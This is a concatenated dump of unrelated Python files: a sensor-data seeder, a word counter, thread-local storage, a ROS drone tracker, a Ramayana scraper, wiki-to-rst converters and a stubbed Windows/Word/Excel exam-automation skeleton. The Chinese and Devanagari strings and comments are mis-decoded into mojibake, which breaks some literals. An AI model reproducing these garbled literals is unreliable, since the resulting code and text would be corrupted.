        device_row = device_row.rstrip()
        if device_row:
            # _ can be used to ignore values that are not needed
            # NOTE(review): ``type`` again shadows the builtin.
            (device_id, _, type, _) = device_row.split(',')
            for day in range(1,6):
                #creating and appending data to the list
                day1 = datetime(2020, 12, day)
                devdaylist.append((device_id, day1))
                for hour in range(0,24):
                    timestamp = datetime(2020, 12, day, hour, 30, 0)
                    # Generates random data value in appropriate range as per the type of sensor (normal bell-curve distribution)
                    if (type.lower() == 'temperature'):
                        value = int(random.normalvariate(24,2.2))
                    elif (type.lower() == 'humidity'):
                        value = int(random.normalvariate(45,3))
                    # NOTE(review): for an unrecognised sensor type,
                    # ``value`` silently keeps its previous value.
                    weather_data = {'device_id': device_id, 'value': value, 'timestamp': timestamp}
                    weather_data_collection = weather_dbh[WEATHER_DATA_COLLECTION]
                    # This inserts the data item as a document in the weather_data collection
                    weather_data_collection.insert_one(weather_data)

#Populating the data to daily_report_model collection on setup
drm = DailyReportModel()
for ddy in devdaylist:
    # Precompute one daily report per (device, day) as user 'admin'.
    drm.insert_daily_report_to_daily_report_model(ddy[0], ddy[1], 'admin')
|
460 | 8cd582915c5abd96a4ef8a3a5309311f2a73a156 |
# Count how often each token occurs on the first line of file.txt.
# Tokens are split on single spaces, so consecutive spaces produce '' tokens.
with open("file.txt", 'r') as fh:
    data = fh.readline()

lis = data.split(' ')
my_dict = {}
for key in lis:
    # dict.get replaces the `key in my_dict.keys()` anti-idiom and avoids
    # the second lookup on the update path.
    my_dict[key] = my_dict.get(key, 0) + 1
print(my_dict)
|
461 | f55b286448f114f3823f099a576af7bec1780a8c | # -*- coding: utf-8 -*-
try:
    # Prefer greenlet-aware context identification when greenlet is installed.
    from greenlet import getcurrent as get_current_greenlet
except ImportError:
    # `int` doubles as a sentinel meaning "greenlet unavailable" (tested with
    # `is` below); it is never actually called.
    get_current_greenlet = int
# NOTE: `thread` is the Python 2 module name (renamed `_thread` in Python 3).
from thread import get_ident as get_current_thread
from threading import Lock
if get_current_greenlet is int: # Use thread
    get_ident = get_current_thread
else: # Use greenlet
    # Identify a context by the (thread, greenlet) pair so greenlets running
    # in the same thread do not share Local data.
    get_ident = lambda: (get_current_thread(), get_current_greenlet())
class Local(object):
    """Context-local attribute storage.

    Every execution context (thread, or (thread, greenlet) pair, as decided
    by the module-level ``get_ident``) sees its own independent namespace of
    attributes. All access is serialized by a single lock.
    """
    __slots__ = ('__data__', '__lock__')

    def __init__(self):
        # object.__setattr__ bypasses our own __setattr__, which would
        # otherwise try to store these in per-context data.
        object.__setattr__(self, '__data__', {})
        object.__setattr__(self, '__lock__', Lock())

    def __iter__(self):
        # NOTE: dict.iteritems is Python 2 only; yields (ident, namespace) pairs.
        return self.__data__.iteritems()

    def __getattr__(self, item):
        with self.__lock__:
            try:
                return self.__data__[get_ident()][item]
            except KeyError:
                # No value stored for this context/attribute pair.
                raise AttributeError(item)

    def __setattr__(self, key, value):
        with self.__lock__:
            ident = get_ident()
            storage = self.__data__
            if ident in storage:
                storage[ident][key] = value
            else:
                # First attribute for this context: create its namespace.
                storage[ident] = {key: value}

    def __delattr__(self, item):
        with self.__lock__:
            try:
                del self.__data__[get_ident()][item]
            except KeyError:
                raise AttributeError(item)

    def __release__(self):
        # Drop everything stored for the current context (no-op if nothing is).
        self.__data__.pop(get_ident(), None)
class LocalStack(object):
    """A stack of objects kept in context-local storage (one stack per
    thread/greenlet), guarded by a lock shared across contexts."""

    def __init__(self):
        self._local = Local()
        self._lock = Lock()

    def push(self, obj):
        """Push ``obj`` onto the current context's stack and return the stack."""
        with self._lock:
            rv = getattr(self._local, 'stack', None)
            if rv is None:
                # First push in this context: create its stack.
                self._local.stack = rv = []
            rv.append(obj)
            return rv

    def pop(self):
        """Remove and return the topmost item, or None if the stack is empty."""
        with self._lock:
            stack = getattr(self._local, 'stack', None)
            if stack is None:
                return None
            elif len(stack) == 1:
                # Last item: release the context-local entry entirely so the
                # storage does not accumulate empty lists.
                self._local.__release__()
                return stack[-1]
            else:
                # BUG FIX: the popped item was previously discarded and the
                # method implicitly returned None on stacks deeper than one.
                return stack.pop()

    @property
    def top(self):
        """The topmost item without removing it, or None if the stack is empty."""
        try:
            return self._local.stack[-1]
        except (AttributeError, IndexError):
            return None
|
462 | e864dad3f46fc9c6c472823bd06ce74fb5cb3f41 | #!/usr/bin/env python
import rospy
import cv2
import numpy as np
from cv_bridge import CvBridge
from matplotlib import pyplot as plt
from sensor_msgs.msg import Image
from drone_app_msgs.msg import BBox, Drone, DroneArray
from rospy.numpy_msg import numpy_msg
# ---------------------------------------
# This is an implementation of a simple CV
# algorithm that can be used for testing
# --- Global variables initialization ---
pub = None
# ---------------------------------------
def processFrame(image_message):
    """ROS image callback: locate the largest near-black blob and publish its
    bounding box as a one-element DroneArray on the module-level `pub`.

    Coordinates are published as percentages of an assumed 640x480 frame.
    """
    # --- Convert from ROS to OpenCV
    frame = CvBridge().imgmsg_to_cv2(image_message)
    # --- Threshold the image and find a mask
    frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
    # Near-black pixels: any hue (0-180), any saturation, value <= 30
    mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))
    mask = cv2.dilate(mask, None, iterations=1)
    # --- Find contours in the mask and initialize the current
    # [-2] keeps this working on both OpenCV 3 (image, contours, hierarchy)
    # and OpenCV 4 (contours, hierarchy) return signatures.
    cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2]
    center = None  # currently unused
    # NOTE(review): max() raises ValueError if no contour was found --
    # confirm frames always contain at least one dark region.
    c = max(cnts, key=cv2.contourArea)
    x,y,w,h = cv2.boundingRect(c)
    # --- Pack in the message
    msg = DroneArray()
    drone = Drone()
    drone.id = -1
    drone.name = 'parrot_bebop2'
    # Scale pixel coordinates to percent of the (assumed) 640x480 frame
    drone.box.t.linear.x = x * 100 / 640
    drone.box.t.linear.y = y * 100 / 480
    drone.box.w = w * 100 / 640
    drone.box.h = h * 100 / 480
    msg.drones.append(drone)
    pub.publish(msg)
if __name__ == '__main__':
    # --- Topics
    rospy.init_node('gazeboTracking', anonymous=True)
    # BUG FIX: create the Publisher BEFORE subscribing. Previously a frame
    # arriving between Subscriber registration and Publisher creation would
    # run processFrame while the module-level `pub` was still None.
    pub = rospy.Publisher('fixed_drones', DroneArray, queue_size=10)
    rospy.Subscriber('camera_img', Image, processFrame)
    rospy.spin()
|
463 | f3a63a22f8746d4a1f127bfe9e8c9d822109ab3c | import logging
import os
import textwrap
from urllib.request import urlopen
from bs4 import BeautifulSoup
from tqdm import tqdm
from doc_curation import book_data
from doc_curation.md import get_md_with_pandoc
from doc_curation.md.file import MdFile
from doc_curation.scraping.misc_sites import iitk
from doc_curation.scraping.html_scraper import souper
from indic_transliteration import sanscript
# Remove all handlers associated with the root logger object.
# (Ensures the basicConfig below takes effect even if logging was already
# configured, e.g. by an imported library.)
for handler in logging.root.handlers[:]:
  logging.root.removeHandler(handler)
logging.basicConfig(
  level=logging.DEBUG,
  format="%(levelname)s:%(asctime)s:%(module)s:%(lineno)d %(message)s")
# JSON describing the kANDa/sarga structure of the Andhra rAmAyaNam edition,
# shipped with the doc_curation package.
unit_info_file = os.path.join(os.path.dirname(book_data.__file__), "data/book_data/raamaayanam/andhra.json")
def dump_sarga(url, out_path, sarga_id, dry_run=False):
  """Scrape one sarga page from valmiki.iitk.ac.in and dump it as markdown.

  Args:
    url: page whose .views-row elements hold the sarga summary and shloka-s.
    out_path: destination markdown file path.
    sarga_id: sarga number; becomes the md title ("%03d").
    dry_run: forwarded to MdFile.dump_to_file; when True nothing is written.
  """
  # browser.implicitly_wait(2)
  page_html = urlopen(url)
  soup = BeautifulSoup(page_html.read(), 'lxml')
  shloka_tags = soup.select(".views-row")
  sarga_content = ""
  for (index, shloka_tag) in enumerate(tqdm(shloka_tags)):
    fields = shloka_tag.select(".field-content")
    if index == 0:
      # First row carries the bracketed sarga summary followed by the shloka.
      sarga_summary = fields[0].contents[0].replace("[", "").replace("]", "")
      shloka = souper.get_md_paragraph(fields[0].contents[1:])
      sarga_content = get_md_with_pandoc(content_in=sarga_summary, source_format="html")
    else:
      shloka = souper.get_md_paragraph(fields[0].contents)
    # Replace ASCII colon with visarga (เค) in the devanAgarI text.
    shloka = shloka.replace(":", "เค")
    word_meaning = souper.get_md_paragraph(fields[1].contents).replace(":", "เค")
    shloka_meaning = souper.get_md_paragraph(fields[2].contents)
    content = textwrap.dedent("""
    ## เคถเฅเคฒเฅเคเค
    ### เคฎเฅเคฒเคฎเฅ
    %s
    ### เคถเคฌเฅเคฆเคพเคฐเฅเคฅเค
    %s
    ### เคเคเฅเคเฅเคฒเคพเคจเฅเคตเคพเคฆเค
    %s
    """) % (shloka, word_meaning, shloka_meaning)
    sarga_content = "%s\n\n%s" % (sarga_content, content)
  md_file = MdFile(file_path=out_path)
  # เคเคคเฅเคฏเคพเคฐเฅเคทเฅ begins the sarga colophon; promote it to a closing heading.
  sarga_content = sarga_content.replace(":", "เค").replace("เคเคคเฅเคฏเคพเคฐเฅเคทเฅ", "\n## เคธเคฎเคพเคชเฅเคคเคฟเค\n")
  md_file.dump_to_file(metadata={"title": "%03d" % sarga_id}, content=sarga_content, dry_run=dry_run)
def dump_all_sargas(base_dir):
  """Dump every sarga of kANDa-s 1-5 as markdown under base_dir/<kanda>/<sarga>.md.

  BUG FIX: this function was previously defined twice, verbatim; the second
  definition silently shadowed the first. The duplicate has been removed.
  """
  for kaanda_index in book_data.get_subunit_list(file_path=unit_info_file, unit_path_list=[]):
    # Only kANDa-s 1-5 are processed.
    if kaanda_index >= 6:
      continue
    sarga_list = book_data.get_subunit_list(file_path=unit_info_file, unit_path_list=[kaanda_index])
    for sarga_index in sarga_list:
      logging.info("Kanda %d Sarga %d", kaanda_index, sarga_index)
      out_path = os.path.join(base_dir, "%d" % kaanda_index, "%03d.md" % sarga_index)
      url = "https://www.valmiki.iitk.ac.in/sloka?field_kanda_tid=%d&language=dv&field_sarga_value=%d" % (
        kaanda_index, sarga_index)
      dump_sarga(url=url, out_path=out_path, sarga_id=sarga_index)
def dump_commentary(base_dir, commentary_id):
  """Dump a commentary (selected by commentary_id, e.g. 14=bhUShaNa) for
  kANDa-s 1-5 as markdown under base_dir/<kanda>/<sarga>.md."""
  for kaanda_index in book_data.get_subunit_list(file_path=unit_info_file, unit_path_list=[]):
    if kaanda_index >= 6:
      continue
    sarga_list = book_data.get_subunit_list(file_path=unit_info_file, unit_path_list=[kaanda_index])
    for sarga_index in sarga_list:
      logging.info("Kanda %d Sarga %d", kaanda_index, sarga_index)
      out_path = os.path.join(base_dir, "%d" % kaanda_index, "%03d.md" % sarga_index)
      url = "https://www.valmiki.iitk.ac.in/commentaries?language=dv&field_commnetary_tid=%d&field_kanda_tid=%d&field_sarga_value=%d" % (
        commentary_id, kaanda_index, sarga_index)
      # The lambda closes over sarga_index but is consumed within this same
      # iteration (dump_item below), so lambda late-binding is harmless here.
      title_maker = lambda soup, title_prefix: sanscript.transliterate("%03d" % sarga_index, sanscript.IAST,
                                                                       sanscript.DEVANAGARI)
      iitk.dump_item(item_url=url, outfile_path=out_path, title_maker=title_maker)
if __name__ == '__main__':
  # Intentionally a no-op: uncomment one of the sample invocations below to
  # run a dump against a local checkout.
  pass
  # dump_all_sargas(base_dir="/home/vvasuki/sanskrit/raw_etexts/purANam/rAmAyaNam/Andhra-pAThaH_iitk/")
  # aandhra.fix_title_names(base_dir="/home/vvasuki/sanskrit/raw_etexts/purANam/rAmAyaNam/kumbhakona", base_dir_ref="/home/vvasuki/sanskrit/raw_etexts/purANam/rAmAyaNam/goraxapuram/VR_with_errors", dry_run=False)
  # dump_commentary(base_dir="/home/vvasuki/sanskrit/raw_etexts/purANam/rAmAyaNam/TIkA/bhUShaNa_iitk/", commentary_id=14)
  # dump_commentary(base_dir="/home/vvasuki/sanskrit/raw_etexts/purANam/rAmAyaNam/TIkA/shiromaNI_iitk/", commentary_id=10)
  # dump_commentary(base_dir="/home/vvasuki/sanskrit/raw_etexts/purANam/rAmAyaNam/TIkA/tilaka_iitk/", commentary_id=13)
|
464 | 90bb70b0a97c7872c8581a176ebacc50df8e1f72 | import datetime
def year_choices():
    """Return (value, label) pairs for every year from 1984 through this year."""
    this_year = datetime.date.today().year
    return [(year, year) for year in range(1984, this_year + 1)]
def current_year():
    """The current calendar year as an int."""
    today = datetime.date.today()
    return today.year
|
465 | d1b2420778e788d78be2a12a27c80f5fa1b15a0f | import functools
import re
from pprint import pprint
def heading(*, marker=''):
    '''
    Decorator factory for rst section headings.

    The decorated function must be called as (obj, title, ...). Its stripped
    return value is underlined with `marker` repeated to the title's length.
    If the stripped result equals the stripped original title, the original
    title is returned unchanged (no heading is emitted).
    '''
    def decorate(func):
        @functools.wraps(func)
        def inner(*args, **kwargs):
            produced = func(*args, **kwargs).strip()
            owner, original_title = args
            if original_title.strip() == produced:
                return original_title
            underline = marker * len(produced)
            return f'\n{produced}\n{underline}\n'
        return inner
    return decorate
def code_pre_block(func):
    '''
    Decorator: wrap the decorated function's returned text in an rst
    ``.. code-block::`` directive, prefixing every line with one space.
    '''
    @functools.wraps(func)
    def inner(*args, **kwargs):
        body = func(*args, **kwargs)
        indented = ''.join(f' {ln}\n' for ln in body.split('\n'))
        return '\n.. code-block::\n\n' + indented
    return inner
def source_block(func):
    '''
    Decorator: format a ``(language, code)`` pair -- as extracted from
    ``<source lang="...">`` blocks, language optional -- as an rst
    ``.. code-block::`` directive.
    '''
    @functools.wraps(func)
    def inner(*args, **kwargs):
        language, body = func(*args, **kwargs)
        header = f'\n\n.. code-block:: {language or ""}\n\n'
        return header + ''.join(f' {ln}\n' for ln in body.split('\n'))
    return inner
def list_block(func):
    '''
    Decorator: convert a MediaWiki-style list (lines prefixed with runs of
    '#', optionally followed by ':', ';' or '*') returned by the decorated
    function into an rst bullet list.

    NOTE(review): every line is indexed at position ``num_markers``
    (``line[num_markers]``), so an empty line or a line of only '#'
    characters raises IndexError -- confirm upstream input never contains
    such lines.
    '''
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        items = func(*args, **kwargs)
        new_list = '\n'
        prev_indent = 0
        sub_list_started = False
        for line in items.split('\n'):
            num_markers = get_num_markers(line) # how many # there are
            indent_by = (num_markers - 1) * 2 # no indentation for first level
            def get_printable_part(string):
                '''
                trim out up to a colon or semi-colon after a # list marker
                '''
                return string[num_markers+1:].strip() if string[num_markers] in [':', ';', '*'] else string[num_markers:].strip()
            # if # is followed by ; or :, it is a continuation of the previous list item
            # this can just be indented
            if line[num_markers] == '*': # bullet list item
                # a sub-bullet run gets a blank line only before its first item
                if not sub_list_started:
                    new_list += f'\n{" " * num_markers*2}* {get_printable_part(line)}\n'
                    sub_list_started = True
                else:
                    new_list += f'{" " * num_markers*2}* {get_printable_part(line)}\n'
                continue
            sub_list_started = False
            if line[num_markers] in [':', ';']:
                # continuation text: indented, no bullet
                line = f'{" " * num_markers*2}{get_printable_part(line)}'
            else:
                line = f'{" " * indent_by}* {get_printable_part(line)}'
            if indent_by != prev_indent: # starting a new level or going back to old level
                line = f'\n{line}' # new level starts a new line
                prev_indent = indent_by
            new_list += f'{line}\n'
        return new_list
    return wrapper
def get_num_markers(string):
    '''
    Return the number of consecutive '#' characters at the start of `string`
    (the wiki list-nesting depth); 0 if it does not start with '#'.
    '''
    count = 0
    for ch in string:
        if ch != '#':
            break
        count += 1
    return count
@list_block
def list_block_converter(match_group):
    """Extract the raw wiki list text (regex group 1); @list_block renders it as rst."""
    return match_group.group(1)
@code_pre_block
def code_pre_block_converter(match_group):
    """Extract preformatted text (regex group 2); @code_pre_block renders it as rst."""
    return match_group.group(2)
@source_block
def source_block_converter(match_group):
    '''
    formats a code block from <source lang="some_language">
    the language part is optional

    Returns the (language, code) pair from regex groups 1 and 2;
    @source_block renders it as an rst code-block directive.
    '''
    return (match_group.group(1), match_group.group(2))
if __name__ == '__main__':
pass |
466 | 29bee4ef11281380aa05d22ef54cb76502ecd685 | from enum import Enum
class CellState(Enum):
    """Life-cycle states of a grid cell, rendered as single letters."""
    EMPTY = 1
    DEAD = 2
    ALIVE = 3
    WAS_ALIVE = 4

    def __str__(self):
        # Map the default "CellState.NAME" rendering onto a one-letter code;
        # anything unrecognized becomes "?".
        abbreviations = {
            "CellState.EMPTY": "E",
            "CellState.DEAD": "D",
            "CellState.ALIVE": "A",
            "CellState.WAS_ALIVE": "W",
        }
        default_str = super(CellState, self).__str__()
        return abbreviations.get(default_str, "?")
|
467 | b453006b4d4c5f17bb58110fe8197d7796ca0c6c | # -*- coding: utf-8 -*-
__author__ = 'tqs'
from win32com.client import Dispatch
import win32com.client
import time
import os
import re
import win32api
'''
windowsๆไฝ้จๅ่ฏดๆ๏ผ
่่ฏๆณขๅ็ฅ่ฏ็น๏ผ
1.ๅ ้คๆไปถๅๆไปถๅคน
2.ๅคๅถๆไปถๅๆไปถๅคน
3.็งปๅจๆไปถๅๆไปถๅคน
4.ๆไปถๅๆไปถๅคนๆนๅ
5.ๆไปถๅฑๆง
่่ฏๆ ทไพ๏ผ
1ใๅจโ่จ็ฑปๆค็ฉโๆไปถๅคนไธญ๏ผๆฐๅปบไธไธชๅญๆไปถๅคนโ่ๅ่จ็ฑปโใ
2ใๅฐๆไปถโๆทกๆฐด่ป.dddโ็งปๅจๅฐโ่ป็ฑปๆค็ฉโๆไปถๅคนไธญใ
3ใ่ฎพ็ฝฎโ่บๆ่ป.aaaโๆไปถๅฑๆงไธบโๅช่ฏปโใ
4ใๅจๆก้ขไธๅปบ็ซโ็ปฟ่ฒๆค็ฉโ็ๅฟซๆทๆนๅผใ
'''
class WinOperation:
def __init__(self):
self.soucePath = ''
self.destPath = ''
self.destFilename = ''
self.sourceFilename = ''
def dele(self,destFilename):#ๅ ้คๆไปถๅๆไปถๅคน
print('ๅ ้คๆไปถ',destFilename)
pass
def rename(self,sourceFilename,destFilename):#ๆไปถๆนๅ
print(sourceFilename,'ๆไปถๆนๅไธบ',destFilename)
pass
def mov(self,sourceFilename,destFilename):#็งปๅจๆไปถ
print(sourceFilename,'็งปๅจๆไปถไธบ',destFilename)
pass
def copy(self,sourceFilename,destFilename):#ๅคๅถๆไปถ
print(sourceFilename,'็งปๅจๆไปถไธบ',destFilename)
pass
def prop(self,destFilename):#ๆไปถๅฑๆง
print('ๆไปถๅฑๆง',destFilename)
pass
def realSourceFilename(self,soucePath,sourceFilename):
return sourceFilename
def realdestFilename(self,destPath,destFilename):
return destFilename
def judgeNew(self,OperStr):#ไปๆๆฌไธญๅคๆญๆฐๅปบๆไปถๆๆไปถๅคน
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
pass
def judgeDele(self,OperStr):#ไปๆๆฌไธญๅคๆญๅ ้คๆไปถ
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
pass
def judgeRename(self,OperStr):#ไปๆๆฌไธญๅคๆญ้ๅฝๅๆไปถ
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
pass
def judgeMov(self,OperStr):#ไปๆๆฌไธญๅคๆญ็งปๅจๆไปถ
#ๅฝขๅฆๅฐๆไปถโๆทกๆฐด่ป.dddโ็งปๅจๅฐโ่ป็ฑปๆค็ฉโๆไปถๅคนไธญใ่ฟ็ง็ปๆ็่งฃๆ
#่งฃๆไธบๆบๆไปถ๏ผ็ฎๆ ๆไปถ
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
#้่ฆๅๅๅพๅฎๆด่ทฏๅพ๏ผ้่ฆๆฅๆพ
sourceFilename=self.realSourceFilename("d:\zrexam\windows",source)
destFilename=self.realdestFilename("d:\zrexam\windows",dest)
self.mov(sourceFilename,destFilename)
def judgeCopy(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
pass
def judgeProp(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
## win32api.SetFileAttributes(fileName,win32con.FILE_ATTRIBUTE_HIDDEN)
## win32api.SetFileAttributes(fileName,win32con.FILE_ATTRIBUTE_NORMAL)
pass
def judgeOperFromList(self,OperStrList):#ๆ นๆฎๅๅฐ้ข้ๆฉๅฏนๅบ็ๆไฝ
for item in OperStrList:
pass
def getOperStrListFromFile(self,filename):#ไปๆไปถไธญๅฐๅๅฐ้ขๆพๅ
ฅๅ่กจ
pass
def judgeOperFromStr(self,OperStr):#ๆ นๆฎๅฐ้ขๆๆฌ้ๆฉๅฏนๅบ็ๆไฝ
if OperStr.find("ๆฐๅปบ") !=-1:
print("่ฟๅ
ฅๆฐๅปบๆไฝ")
self.judgeNew(OperStr)
print("็ปๆๆฐๅปบๆไฝ")
if OperStr.find("ๅ ้ค") !=-1:
print("่ฟๅ
ฅๅ ้คๆไฝ")
self.judgeDele(OperStr)
print("็ปๆๅ ้คๆไฝ")
if OperStr.find("ๅคๅถ") !=-1:
print("่ฟๅ
ฅๅคๅถๆไฝ")
self.judgeCopy(OperStr)
print("็ปๆๅคๅถๆไฝ")
if OperStr.find("็งปๅจ") !=-1:
print("่ฟๅ
ฅ็งปๅจๆไฝ")
self.judgeMov(OperStr)
print("็ปๆ็งปๅจๆไฝ")
if OperStr.find("ๆนๅ") !=-1:
print("่ฟๅ
ฅๆนๅๆไฝ")
self.judgeRename(OperStr)
print("็ปๆๆนๅๆไฝ")
if OperStr.find("ๅฑๆง") !=-1:
print("่ฟๅ
ฅๅฑๆงๆไฝ")
self.judgeProp(OperStr)
print("็ปๆๅฑๆงๆไฝ")
'''
wordๆไฝ้จๅ่ฏดๆ๏ผ
่่ฏๆณขๅ็ฅ่ฏ็น๏ผ
1.ๅญไฝ
2.ๆฎต่ฝ
3.ๆฅๆพๆฟๆข
4.ๆๅ
ฅ ่กจๆ ผ๏ผ่บๆฏๅญ๏ผๅพ็
5.้กต่พน่ท๏ผๅๆ
1. ๅฐๆ ้ขโๅธๆฉ้พๅฟโ่ฎพ็ฝฎไธบ้ปไฝ๏ผๅฑ
ไธญๅฏน้ฝใ
2๏ผๅฐๆไธญ็ฌฌไบๆฎต๏ผ่ฟไธชๅฐๅญฆ่ฎพๅจไธๅบงๅบๅ
โฆโฆ๏ผ่ฎพ็ฝฎไธบ้ฆ่ก็ผฉ่ฟ2ๅญ็ฌฆใ
3๏ผๅฐๆไธญๆๆ็โ็ฐ่ๅธโๆฟๆขไธบโ็ฐๅ
็โใ
4. ่ฎพ็ฝฎ้กต่พน่ทไธบไธไธๅ2.5ๅ็ฑณ๏ผๅบ็จไบๆด็ฏๆๆกฃ๏ผใ
5. ๅจๆญฃๆไธ้ข็็ฉบ็ฝๅคๆๅ
ฅ่บๆฏๅญ๏ผๅ
ๅฎนไธบโๅธๆฉ้พๅฟโ๏ผๆ ทๅผไปป้๏ผใ
่่ฏๆ ทไพ๏ผ
'''
class WordOperation:
def __init__(self, filename=None): #ๆๅผๆไปถๆ่
ๆฐๅปบๆไปถ๏ผๅฆๆไธๅญๅจ็่ฏ๏ผ
self.wordApp = win32com.client.Dispatch('Word.Application')
if filename:
self.filename = filename
else:
self.filename = ''
def save(self, newfilename=None): #ไฟๅญๆไปถ
if newfilename:
self.filename = newfilename
else:
pass
def close(self): #ๅ
ณ้ญๆไปถ
del self.wordApp
def fontOper(self):
pass
def replaceOper(self,source,dest):
pass
def insertOper(self,style):
pass
def pageOper(self):
pass
def paragraphOper(self):
pass
def judgePage(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeFont(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeReplace(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeInsert(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeParagraph(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeOperFromStr(self,OperStr):#ๆ นๆฎๅฐ้ขๆๆฌ้ๆฉๅฏนๅบ็ๆไฝ
if OperStr.find("ๆ ้ข") !=-1 or OperStr.find("้ปไฝ") !=-1 or OperStr.find("ๅฑ
ไธญๅฏน้ฝ") !=-1:
print("่ฟๅ
ฅๅญไฝๆไฝ")
self.judgeFont(OperStr)
print("็ปๆๅญไฝ")
elif OperStr.find("้ฆ่ก็ผฉ่ฟ") !=-1 or OperStr.find("่ก่ท") !=-1:
print("่ฟๅ
ฅๆฎต่ฝๆไฝ")
self.judgeParagraph(OperStr)
print("็ปๆๆฎต่ฝๆไฝ")
elif OperStr.find("ๆๅ
ฅ") !=-1:
print("่ฟๅ
ฅๆๅ
ฅๆไฝ")
self.judgeInsert(OperStr)
print("็ปๆๆๅ
ฅๆไฝ")
elif OperStr.find("้กต่พน่ท") !=-1:
print("่ฟๅ
ฅ้กต่พน่ทๆไฝ")
self.judgePage(OperStr)
print("็ปๆ้กต่พน่ทๆไฝ")
elif OperStr.find("ๅๆ ") !=-1:
print("่ฟๅ
ฅๅๆ ๆไฝ")
self.judgeFont(OperStr)
print("็ปๆๅๆ ๆไฝ")
elif OperStr.find("ๆฟๆข") !=-1:
print("่ฟๅ
ฅๆฟๆขๆไฝ")
self.judgeReplace(OperStr)
print("็ปๆๆฟๆขๆไฝ")
'''
Excelๆไฝ้จๅ่ฏดๆ๏ผ
่่ฏๆณขๅ็ฅ่ฏ็น๏ผ
1.่ก้ซๅๅฎฝ
2.ๆ ผๅผ็ธๅ
ณ
3.ๅ
ฌๅผๅฝๆฐ
4.ๆๅบ
5.ๆๅ
ฅๅพ่กจ
่่ฏๆ ทไพ๏ผ
1.ๅฐA2ๆๅจ่ก็่ก้ซ่ฎพ็ฝฎไธบ30๏ผ40ๅ็ด ๏ผใ
2.ๆ นๆฎๅทฅไฝ่กจไธญๆไพ็ๅ
ฌๅผ๏ผ่ฎก็ฎๅ็ญ็บง็โ3D็คพๅขๅไธๆฏไพโ๏ผๅนถๅฐ็ปๆๅกซๅๅจF3:F7ๅๅ
ๆ ผๅ
ใ
3.็ปA2:F8ๅๅ
ๆ ผๅบๅๅ ๆๆๆก็บฟใ
4.ๆโๆ ไบบๆบ็คพๅขไบบๆฐโ็ฑ้ซๅฐไฝๆๅบใ
5.้ๅฎA2:B7ๅๅ
ๆ ผๅบๅ๏ผๅถไฝโไธ็ปดๆ็บฟๅพโ๏ผๅนถๆๅ
ฅๅฐSheet1ๅทฅไฝ่กจไธญใ
'''
class ExcelOperation:
def __init__(self, filename=None): #ๆๅผๆไปถๆ่
ๆฐๅปบๆไปถ๏ผๅฆๆไธๅญๅจ็่ฏ๏ผ
self.xlApp = win32com.client.Dispatch('Excel.Application')
if filename:
self.filename = filename
self.xlBook = self.xlApp.Workbooks.Open(filename)
else:
self.xlBook = self.xlApp.Workbooks.Add()
self.filename = ''
def save(self, newfilename=None): #ไฟๅญๆไปถ
if newfilename:
self.filename = newfilename
self.xlBook.SaveAs(newfilename)
else:
self.xlBook.Save()
def close(self): #ๅ
ณ้ญๆไปถ
self.xlBook.Close(SaveChanges=0)
del self.xlApp
def getCell(self, sheet, row, col): #่ทๅๅๅ
ๆ ผ็ๆฐๆฎ
"Get value of one cell"
sht = self.xlBook.Worksheets(sheet)
return sht.Cells(row, col).Value
def setCell(self, sheet, row, col, value): #่ฎพ็ฝฎๅๅ
ๆ ผ็ๆฐๆฎ
"set value of one cell"
sht = self.xlBook.Worksheets(sheet)
sht.Cells(row, col).Value = value
def setCellformat(self, sheet, row, col): #่ฎพ็ฝฎๅๅ
ๆ ผ็ๆฐๆฎ
"set value of one cell"
sht = self.xlBook.Worksheets(sheet)
sht.Cells(row, col).Font.Size = 15#ๅญไฝๅคงๅฐ
sht.Cells(row, col).Font.Bold = True#ๆฏๅฆ้ปไฝ
sht.Cells(row, col).Font.Name = "Arial"#ๅญไฝ็ฑปๅ
sht.Cells(row, col).Interior.ColorIndex = 3#่กจๆ ผ่ๆฏ
#sht.Range("A1").Borders.LineStyle = xlDouble
sht.Cells(row, col).BorderAround(1,4)#่กจๆ ผ่พนๆก
